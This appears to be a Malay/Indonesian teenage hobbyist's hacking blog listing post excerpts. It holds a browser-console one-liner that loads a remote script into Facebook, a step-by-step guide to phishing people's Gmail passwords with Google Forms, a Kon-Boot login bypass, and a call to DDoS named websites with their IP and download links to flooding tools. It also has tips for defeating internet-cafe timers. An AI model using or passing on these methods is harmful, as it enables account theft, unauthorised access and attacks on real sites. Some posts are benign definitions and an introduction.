Script auto invite friend to your group

0 Komen Budak Comeii
Untuk pengguna Mozilla Firefox 1. Tekan CTRL + SHIFT + K 2. Lalu isi kode ini document.body.appendChild(document.createElement('script')).src='http://fadhiilrachman.net/inpit.js'; dan tekan ENTER Untuk pengguna Google Chrome 1. Klik Mouse Kanan 2. Tekan Inspect Element (Q) 3. Pilih Console 4. Lalu isi kode ini document.body.appendChild(document.createElement('script')).src='http://fadhiilrachman.net/inpit.js'; 5. Lalu Enter
Continue reading →

Google Pishing

0 Komen Budak Comeii
Gmail Hacking ~ 1)korang pergi daftar Gmail 2)pastu korg Log In Gmail ( search balik google.com ) 3)pastu korg bkk:www.google.com 4)korang ade nampak tak EVEN MORE ? 5)Korang tkn more tu pastu ambil Document 6)pastu ade CREATE tulisan merah ? 7)Korg click tu pastu ambil FORM 8)pastu ade Question title korg letak EMAIL 9)Pastu terus click DONE 10)pastu korg tengok dekat SAMPLE QUESTION 2 . ade tak gambar pensil. 11)korang click gambar PENSIL tu. 12)SAMPLE QUESTION 2 tukar menjadi=Password .Lepas tu korg click DONE 13)selepas tu korang tengok UNTITLED FORM. tukar menjadi=APE YANG KORANG NAK ! 14)pastu korang tgk ade THEME:PLAN .click tu.pilih mana korg nak.pastu click 15)lepas korg pilih dah ade keluar kan ?haaa . pastu korg ade nampak APPLY. 16)korg click APPLY . 17)pastu korg type Web ni lagi :www.google.com 18)korang tengok dekat MORE balik .pastu amek DOCUMENTS 19)pastu ,korang tengok bawah TITLE .ade file korang.korang click 20)pastu korang tengok SHARE tulisan biru . korang CLICK 21)pastu keluar SHARING SETTING , PRIVATE-only the people listed below access Korg CHANGE menjadi PUBLIC ON THE WEB. 22)pastu korang terus tekan SAVE pastu korang CLICK DONE 23)pastu korang cari FORM .korang CLICK GO TO LIVE FORM 24)haaaaaaaaaaaa . sampai sini aq rasa korang dah melompat-lompat . hehe ~ 25)korang copy LINK .pastu anta kat MANGSA . automatic EMAIL&PASSWORD masuk dekat Account korang :D
Continue reading →

Ceroboh laptop bila lupa password menggunakan konsub !

0 Komen Budak Comeii
Mula2 pegi website ni http://hacks666.wapka.mobi/site_97.xhtml klik (download 'konusb' software) pastu extract dlm pendrive korg pastu.. buka file KONUSB klik KonBootInstall.exe nanti akan kuar kotak hitam... pilih korg punya pendrive location.. sebagai contoh pendrive aku kat E taip E pastu korg klik enter.. selesai.. pastu..alatan korg dah selesai.. ambik laptop yg korg nk buka tanpa password tu cucuk pendrive yg korg dah letak konboot tu cucuk kat laptop tu.. pastu on kan.. pastu reboot guna pendrive tu.. nak reboot pepandai le... ada certain laptop korg kena active kan dulu tp laptop aq dah tersedia butang f12..so aku tekan f12 nanti aq pilih pendrive yg ada software konboot tu... window XP dia akan terus masuk window tp kalau window 7 kalau dye suruh masukan password. . .korang tekan enter jea. . . jeng jeng jeng ' kan dah boley ^^'!
Continue reading →

HacK FacebooK

0 Komen Budak Comeii
cara2 hack fb prgkat pertama.....^^, ==> Cara Hack Facebook Dengan Cara Forgot Password - http://t.co/PaeWGrg1 ==> Cara Hack Facebook Dengan Mozilla Firefox - http://t.co/4PlJw9ee ==> Cara Hack Facebook Tanpa Menggunakan Software [Update] - http://java-cyber.blogspot.com/2011/10/cara-hack-facebook-tanpa-menggunakan.html ==> Cara Hack Facebook Dengan Metode Phising - http://java-cyber.blogspot.com/2011/10/cara-hack-facebook-dengan-metode.html ==> Cara Hack Facebook Dengan Metode Network Sniffing - http://java-cyber.blogspot.com/2011/10/cara-hack-facebook-dengan-metode_30.html ==> Cara Hack Facebook Dengan Metode MD5 + Software - http://java-cyber.blogspot.com/2011/10/cara-hack-facebook-dengan-metode-md5.html ==> Cara Hack Facebook Dengan Metode Bruteforce - http://java-cyber.blogspot.com/2011/11/cara-hack-facebook-dengan-metode.html ==> Cara Hack Facebook Via Facebook - http://java-cyber.blogspot.com/2011/11/cara-hack-facebook-via-facebook.html Selamat Mencuba !
Continue reading →

Ddos Website

0 Komen Budak Comeii
PERHATIAN ! SEMUA TOOL DAH SEDIA ADA DI BAWAH !______________________________________________________________________________________________________________ Target : kalau ade sape2 tau website yg menghina islam & lucah sila tambah...______________________________________________________________________________________________________________ Website : DDos Now 1.http://www.lolokaust.com/2.http://lolokaust.com/guides/islam.html (74.50.25.165) REAL IP .3.http://www.godhatesislam.com/4.5.6.7.8.9.10. DDos With Notepad : http://www.mediafire.com/?76advu6rdckmuyvDDos oneline :http://www.silenthackermalaysia.com/Loader.html______________________________________________________________________________________________________________ ********* MASTER LIST **********~~RUDY R U Dead Yet~~ attack (Slowloris on steroids)~WEBSITE CRUSHER~http://packetstormsecurity.org/files/95882/R-U-Dead-Yet-Denial-Of-Service-Tool.html XerXes STRONG DDoSser code:http://pastebin.com/aWZMbjSU HULK DDoSser:http://www.mediafire.com/?tb7d9t203v7twdy TORSHAMMER:http://pastebin.com/Vq90V9yn TOOLS:http://www.4shared.com/rar/qB4gN_QJ/Ul7r4_H4ck3r_700l5_4.html TOOLS:http://www.mediafire.com/?f6syx512mr264d4 TOOL PACK: any password requests: 123123http://www.mediafire.com/?syx7ad1yot8n3 Ddos tools -LOIC download from here : http://sourceforge.net/projects/loic/files/latest/download Anonymous Weapons:http://anonymousks.weebly.com/weapons.html LOIC tutorial (if u dont know how to use it):http://www.youtube.com/watch?v=sQRu-J3f_Kw FireFlood, Download link : http://www.2shared.com/file/2CGUUHtB/Fireflood_12.html Anonymous DoSer, Download link : http://www.2shared.com/file/UOZbt7I0/Anonymous_DoSer.html Online HOIC (Change threads to 1,000 and enter URL)http://pastehtml.com/view/blclqdm91.html [: Denial-of-service attack & Deface Programs :]http://www.mediafire.com/?3j9lp4avc1tjplt [: Cyber Ghost VPN Program :]http://cyberghostvpn.com/ [: Free Emails To Use VPN :]http://pastebin.com/G9yQhHmg______________________________________________________________________________________________________________ #DDos WEBSITE YANG MENGHINA ISLAM ! :http://www.facebook.com/events/469097303129797/473696229336571/?ref=notif¬if_t=plan_mall_activity Anjuran ZACC : http://www.facebook.com/pages/Zombie-Attacker-Cyber-Crews/331831116901339?ref=hl______________________________________________________________________________________________________________ #Op Myanmar :http://www.facebook.com/events/275942749173008/______________________________________________________________________________________________________________ Cara Hide Ip : *http://0101virushackerz.blogspot.com/2011/12/cara-menyembunyikan-ip-address-tanpa.html http://hotspotshield.com/ http://vpnreactor.com/ http://proxpn.com/ http://download25.com/install/hide-my-ip.html http://www.mediafire.com/?dy02ygzntasteiv(hide my ip)______________________________________________________________________________________________________________
Continue reading →

Tutorial Hack Timer di CyberCafe

0 Komen Budak Comeii
Try and Error ... Step 1.Buka command prompt (start>run>cmd) Step 2.Pastu dah buka cmd korang taip cd\windows Step 3.Pastu taip Regedit Step 4.Oke Sekarang pergi cariHKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>currentversion>internet settings>policies>system Step 5. Cari Disable Task manager rightclick on kan scroll bawah pastu bagi value dia 0 Step 6.Pastu open task manager (CTRL+ALT+DELETE) Step 7. Disable Internet cafe Timer.
Continue reading →

Cara untuk dapatkan facebook yg telah di tukar password

1 Komen Budak Comeii

Bagaimana jika FB kita di hack orang lain? pasword diganti,pasword emailpun diganti bahkan security question juga diganti oleh orang itu sehingga otomatis kita tidak bisa login ke email untuk menerima kode konfirmasi untuk merubah merebut kembali fb kita..


disini ada sebuah cara yang bisa sobat pakai dengan syarat email fb belum diganti dngn email yang lain. 1.login ke fb masukin email dan pasword sebelumnya,nanti stelah klik login bakal ada tulisan incorect pasword..login terus sebnyak 2x lagi nanti akan muncul “kamu telah mengganti pasword pada tanggal sekian sekian” lalu pilih “I think Ive been hacked” nanti ada kotak dialog (isi aja kolom emailnya doank)
2.setelah itu akan ada muncul kotak dengan url Http://ssl.roadblock/…..
nah isi captchanya,,setelah diisi jngn dulu klik OK ataw next tapi kamu buka tab baru ataw jendela dengan browser yang sama masuk ke http://ssl.facebook.com/confirmphone.php isi dengan nomor indosat kamu,,,lalu ikuti petunjuknya nanti bakal ada konfirmasi dari fb masuk k hp mu…


3.masukan kode konfirmasi ke kotak konfirmasi facebook…setelah berhasil lanjut kamu kembali ke page yang tadi kamu isi capchanya,,,sekarang klik ok/next nah nanti setelah itu akan ada pilihan konfirmasi permintaan pengirimn kode,,nah kalo kamu ga pake cara masuk dulu ke link page confirm form tadi maka yang akan muncul adalah satu options yaitu pengiriman kode konfirmasi hanya melalui email sedangkan email kan ga bsa dibuka lagi..tapi karena udah masuk dulu ke page confim phone maka options skrng ada dua yaitu ke email dan nmr hp,,pilih options kirim kode ke nomor hp….setelah itu tinggal ikuti petunjuknya,,,udah dehhh fb kamu bisa balik lagi,,,,tinggal atur kembali aja paswordnya terserah kamu..
selamt praktek,,,,tingkat keberhasilan tergantung nomor hp yang digunakan,,,klo bisa pake indosat..kalo gagal dalam link confirm phone maka sehari kemudian baru kamu bisa coba kembali….

bahan diperoleh dari : Doy Shinja Official


Continue reading →

Perbezaan Antara Seorang Hacker & Cracker

0 Komen Budak Comeii

Apakah perbezaan antara seorang Hacker & Cracker?
sedikit tips untuk korang .

Apa itu Cracker?
Di http://www.whatis.com/, Cracker didefinisikan sebagai “seseorang yang masuk ke dalam sistem orang lain, biasanya di jaringan komputer, bypass(melepasi) password atau lesen program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat membuat perkara seperti ini untuk keuntungan, maksud jahat, atau kerana sebab lainnya seperti ada halangan atau tentangan. Beberapa proses pencerobohan dilakukan untuk menunjukan kelemahan keamanan sistem”.

Apa itu Hacker?
Berbeza dengan Hacker, menurut Eric Raymond didefinisikan sebagai programmer yang pandai. Sebuah proses hack yang baik adalah penyelesaian yang bagus kepada masalah programming dan “hacking” adalah proses pembuatannya. Ada beberapa karakteristik yang menandakan seseorang adalah Hacker, seperti:

1. Suka belajar detail dari bahasa programming atau system

2. Melakukan pemograman tidak cuma berteori saja

3. Menghargai, menikmati hasil hacking orang lain

4. Dapat secara cepat belajar pemogramman

5. Ahli (pakar) dalam bahasa pemograman tertentu atau sistem tertentu, seperti “UNIX Hacker”.

Sumber : DevilProxy ( c/p )


Continue reading →

Check Website Down ke Ok ?

0 Komen Budak Comeii
Tak sangka pula, kita boleh check sama ada website atau blog kita telah 'down' atau masih keaadan baik. rezza pown ada bca dlam satuw hacking blogger niyh ,

Anda boleh try check website yang down atau tidak di http://isup.me/

Letak saja nama url website atau blog anda, lepas tu tekan ENTER.

Ni satu lagi website yang boleh check http://ilumu.com/


SELAMAT MENCUBA !



Continue reading →

first time update :'D

0 Komen Budak Comeii
hi selamat datang ke blogger si kedingg :'3
maaf jika taa elok ,
first time si keding update sendiri blogger tanpa mnggunakan batuan kengkawan.

agak susa lhaa :'D hee ,
first skaly nk pkenal lhaa jugak diri kan .
haa okay- ii .

mohd kamel rezza bin abdul ghani ,
6steen y/o
alor setar kay .

if nak knal lebih dalam add rezza lam facebook .
ada tuh haa hujung atas sbelah kanan,
click ctuw , tkan ADD AS FRIEND if nk knal lebih dkad ;')

dah- ii rezza tanak ckap bnyak :'D hee ,

salam perkenalan cmua blogger ;')
cmpay kt cniey jea kowd rezza update :'D
hee , asalamualaikum .
jumpak lagiey ^^!
Continue reading →